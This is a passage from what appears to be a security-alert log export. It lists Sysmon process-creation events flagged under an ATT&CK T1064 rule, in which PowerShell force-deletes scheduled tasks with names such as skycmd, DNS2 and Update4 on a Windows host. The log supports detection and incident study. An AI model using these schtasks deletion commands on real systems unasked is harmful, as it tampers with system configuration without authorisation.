/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.139305100Z"",""eventRecordID"":""3568"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.137\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-00107c002f00}\r\nProcessId: 7396\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.137"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-00107c002f00}"",""processId"":""7396"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN skycmd /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.398",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.106 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001057fe2e00} +ProcessId: 7752 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEMa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.109654800Z"",""eventRecordID"":""3567"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.106\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001057fe2e00}\r\nProcessId: 7752\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.106"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-001057fe2e00}"",""processId"":""7752"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEMa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.376",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.068 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001000fc2e00} +ProcessId: 4788 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.071184800Z"",""eventRecordID"":""3566"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.068\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001000fc2e00}\r\nProcessId: 4788\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.068"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-001000fc2e00}"",""processId"":""4788"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.323",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.041 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001029fa2e00} +ProcessId: 5604 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEM /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.043873400Z"",""eventRecordID"":""3565"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.041\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001029fa2e00}\r\nProcessId: 5604\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.041"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-001029fa2e00}"",""processId"":""5604"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEM /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.297",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.014 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001074f82e00} +ProcessId: 6300 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.019366000Z"",""eventRecordID"":""3564"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.014\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001074f82e00}\r\nProcessId: 6300\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.014"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-001074f82e00}"",""processId"":""6300"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.286",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.982 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001096f62e00} +ProcessId: 7352 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update4 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.985168900Z"",""eventRecordID"":""3563"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.982\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001096f62e00}\r\nProcessId: 7352\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.982"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-001096f62e00}"",""processId"":""7352"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update4 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.282",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.933 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001091f42e00} +ProcessId: 7372 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.938816900Z"",""eventRecordID"":""3562"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.933\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001091f42e00}\r\nProcessId: 